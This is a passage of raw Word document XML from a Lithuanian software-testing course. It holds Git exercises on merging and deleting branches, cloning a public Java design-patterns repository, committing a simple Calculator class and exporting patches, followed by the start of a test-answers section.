          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Git šakų apjungimui naudojame komandas:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00616C06" w:rsidP="00372B3A">
      <w:pPr>
        <w:ind w:leftChars="100" w:left="240" w:right="284"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>1. git merge master testing</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00616C06" w:rsidP="00372B3A">
      <w:pPr>
        <w:ind w:leftChars="100" w:left="240" w:right="284"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>2. git merge master new-feature</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
      <w:pPr>
        <w:ind w:leftChars="100" w:left="240" w:right="284"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00616C06" w:rsidP="00372B3A">
      <w:pPr>
        <w:ind w:right="284"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Git šakų trynimui naudojame komandą:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00616C06" w:rsidP="00372B3A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:leftChars="100" w:left="240" w:right="284"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>1. git branch -d testing</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00616C06" w:rsidP="00372B3A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:leftChars="100" w:left="240" w:right="284"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>2. git branch -d new-feature</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:right="282"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00616C06" w:rsidP="00372B3A">
      <w:pPr>
        <w:ind w:right="284"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Papildomai galite paskaityti:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00616C06" w:rsidP="00372B3A">
      <w:pPr>
        <w:ind w:right="284"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:iCs/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:iCs/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> Git (2019). </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:i/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Git Branching - Branches in a Nutshell</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:iCs/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">. [žiūrėta 2019-05-27]. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00616C06" w:rsidP="00372B3A">
      <w:pPr>
        <w:ind w:right="284"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:i/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:iCs/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">Prieiga per internetą </w:t>
      </w:r>
      <w:hyperlink r:id="rId224" w:history="1">
        <w:r w:rsidRPr="00784DF5">
          <w:rPr>
            <w:color w:val="006400"/>
            <w:u w:val="single"/>
            <w:lang w:val="lt-LT"/>
          </w:rPr>
          <w:t>https://git-scm.com/book/en/v2/Git-Branching-Branches-in-a-Nutshell.</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00784DF5">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </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 xml:space="preserve">9 užduotis. </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>NUKOPIJUOKITE KODO PAVYZDĮ IŠ NUOTOLINĖS GITHUB KODO</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:i/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>SAUGYKLOS</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:i/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:hyperlink r:id="rId225" w:history="1">
        <w:r w:rsidRPr="00C1573B">
          <w:rPr>
            <w:bCs/>
            <w:color w:val="006400"/>
            <w:szCs w:val="28"/>
            <w:lang w:val="lt-LT"/>
          </w:rPr>
          <w:t>HTTPS://GITHUB.COM/ILUWATAR/JAVA-DESIGN-PATTERNS</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="001D4F26" w:rsidRPr="00C1573B">
        <w:rPr>
          <w:bCs/>
          <w:color w:val="006400"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00C1573B">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00616C06" w:rsidP="00372B3A">
      <w:pPr>
        <w:ind w:right="284"/>
        <w:jc w:val="both"/>
        <w:outlineLvl w:val="3"/>
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Kodo kopijavimas iš nuotolinės saugyklos:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00616C06" w:rsidP="00372B3A">
      <w:pPr>
        <w:ind w:right="284"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>1. git clone https://github.com/iluwatar/java-design-patterns</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:right="282"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00616C06" w:rsidP="00372B3A">
      <w:pPr>
        <w:ind w:right="282"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Redaguojame failą README.md (projekto aprašymas). Įrašome į šį failą eilutė: “This is my forked project.”. Pakeitimus įrašome į kodo saugyklą:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00514515" w:rsidP="00372B3A">
      <w:pPr>
        <w:ind w:right="284"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidR="00616C06" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>. git add README.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00514515" w:rsidP="00372B3A">
      <w:pPr>
        <w:ind w:right="284"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidR="00616C06" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>. git commit -m “Changed README.md file, change project description.”</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:right="282"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00616C06" w:rsidP="00372B3A">
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:right="282"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Savo nuožiūra padarykite dar kelis pakeitimus projekto failuose ir juos įrašykite į kodo saugyklą.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00616C06" w:rsidP="00372B3A">
      <w:pPr>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:right="284"/>
        <w:jc w:val="both"/>
        <w:outlineLvl w:val="3"/>
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:i/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">10 užduotis. </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>SUKURKITE LOKALIĄ GIT KODO SAUGYKLĄ APLANKE VARDU CALCULATOR</w:t>
      </w:r>
      <w:r w:rsidR="00B21D0E">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00616C06" w:rsidP="00372B3A">
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:outlineLvl w:val="3"/>
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Sukuriame aplanką vardu Calculator. Jame inicializuojame naują Git kodo saugyklą su Git komandą: git init. Toliau sukuriame Java projektą su klase Calculator.java. Parašome skaičiuotuvo aritmetines operacijas. Kiekvieną parašytą aritmetinį veiksmą įrašome į kodo saugyklą. Pavyzdys sudėties operatoriui:</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ublic class Calculator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ivate int numberOne;</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ivate int numberTwo;</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private char operator;</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Calculator(int numberOne, int numberTwo, char operator)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numberOne = numberOne;</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lastRenderedPageBreak/>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:tab/>
        <w:t>this.numberTwo = numberTwo;</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this.operator = operator;</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switch (operator)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case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add(this.numberOne, this.numberTwo);</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break;</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defaul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r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:tab/>
        <w:t>System.out.println("Not selected operator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int add(int numberOne, int numberTwo) {</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r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:tab/>
        <w:t>return numberOne + numberTwo;</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sz w:val="20"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:tab/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00616C06" w:rsidP="00372B3A">
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:left w:val="single" w:sz="4" w:space="4" w:color="auto"/>
          <w:bottom w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:right w:val="single" w:sz="4" w:space="4" w:color="auto"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:before="120" w:after="120"/>
        <w:ind w:leftChars="100" w:left="240" w:right="282"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:eastAsia="DejaVu Sans Mono"/>
          <w:sz w:val="20"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00616C06" w:rsidP="00372B3A">
      <w:pPr>
        <w:ind w:right="284"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Parašius šį kodą įvykdome Git komandas:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00616C06" w:rsidP="00372B3A">
      <w:pPr>
        <w:ind w:leftChars="100" w:left="240" w:right="284"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>1. git add .</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00616C06" w:rsidP="00372B3A">
      <w:pPr>
        <w:ind w:leftChars="100" w:left="240" w:right="284"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>2. git commit -m “Add adder function in Calculator.”</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00616C06" w:rsidP="00372B3A">
      <w:pPr>
        <w:ind w:leftChars="100" w:left="240" w:right="284"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>3. git status</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00616C06" w:rsidP="00372B3A">
      <w:pPr>
        <w:ind w:leftChars="100" w:left="240" w:right="284"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
      <w:r w:rsidR="00ED5558">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> git log</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:right="282"/>
        <w:jc w:val="both"/>
        <w:outlineLvl w:val="3"/>
        <w:rPr>
          <w:bCs/>
          <w:i/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00616C06" w:rsidP="00372B3A">
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:right="282"/>
        <w:jc w:val="both"/>
        <w:outlineLvl w:val="3"/>
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:i/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">11 užduotis. </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>SAVO SKAIČIUOTUVUI</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:i/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> (10 užduotis) </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>PADARYKITE KODO PATAISYMUS IR JUOS EKSPORTUOKITE SU GIT KOMANDĄ GIT FORMAT-PATCH</w:t>
      </w:r>
      <w:r w:rsidR="00B21D0E">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00616C06" w:rsidP="00372B3A">
      <w:pPr>
        <w:ind w:right="284"/>
        <w:jc w:val="both"/>
        <w:outlineLvl w:val="3"/>
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Pataisymų eksportui naudokite komandą: git format-patch &lt;commit number&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00616C06" w:rsidP="00372B3A">
      <w:pPr>
        <w:ind w:right="284"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Papildomai galite paskaityti:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00616C06" w:rsidP="00372B3A">
      <w:pPr>
        <w:ind w:right="284"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:iCs/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">Git (2019). </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:i/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Git format patch</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:iCs/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">. [žiūrėta 2019-05-27]. Prieiga per internetą </w:t>
      </w:r>
      <w:hyperlink r:id="rId226" w:history="1">
        <w:r w:rsidRPr="00E852D4">
          <w:rPr>
            <w:color w:val="006400"/>
            <w:u w:val="single"/>
            <w:lang w:val="lt-LT"/>
          </w:rPr>
          <w:t>https://git-scm.com/docs/git-format-patch.</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00E852D4">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:bCs/>
          <w:kern w:val="36"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="es-ES" w:eastAsia="x-none"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:bCs/>
          <w:kern w:val="36"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="es-ES" w:eastAsia="x-none"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="001D4F26" w:rsidP="00372B3A">
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="720" w:right="282"/>
        <w:jc w:val="center"/>
        <w:outlineLvl w:val="0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:caps/>
          <w:kern w:val="36"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="999" w:name="_Toc14393129"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="36"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>Modulis „Į</w:t>
      </w:r>
      <w:r w:rsidRPr="001D4F26">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="36"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>vadas į darbo rinką“</w:t>
      </w:r>
      <w:bookmarkEnd w:id="999"/>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="001D4F26" w:rsidP="00372B3A">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:outlineLvl w:val="0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:kern w:val="36"/>
          <w:lang w:eastAsia="x-none"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="1000" w:name="_Toc14393130"/>
      <w:r w:rsidRPr="001D4F26">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:kern w:val="36"/>
          <w:lang w:eastAsia="x-none"/>
        </w:rPr>
        <w:t>TEST</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1000"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:kern w:val="36"/>
          <w:lang w:eastAsia="x-none"/>
        </w:rPr>
        <w:t>O ATSAKYMAI</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00E350EA" w:rsidP="00372B3A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="44"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>d</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
      <w:pPr>
        <w:ind w:left="1440"/>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00E350EA" w:rsidP="00372B3A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="44"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">Panagrinėkite žemiau pateiktas testavimo lygių sąvokas. Sudėliokite jas eilės tvarka, kuria jie dažniausiai yra vykdomi. Pakomentuokite, jei matote kokių nors panašumų. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00E350EA" w:rsidP="00372B3A">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
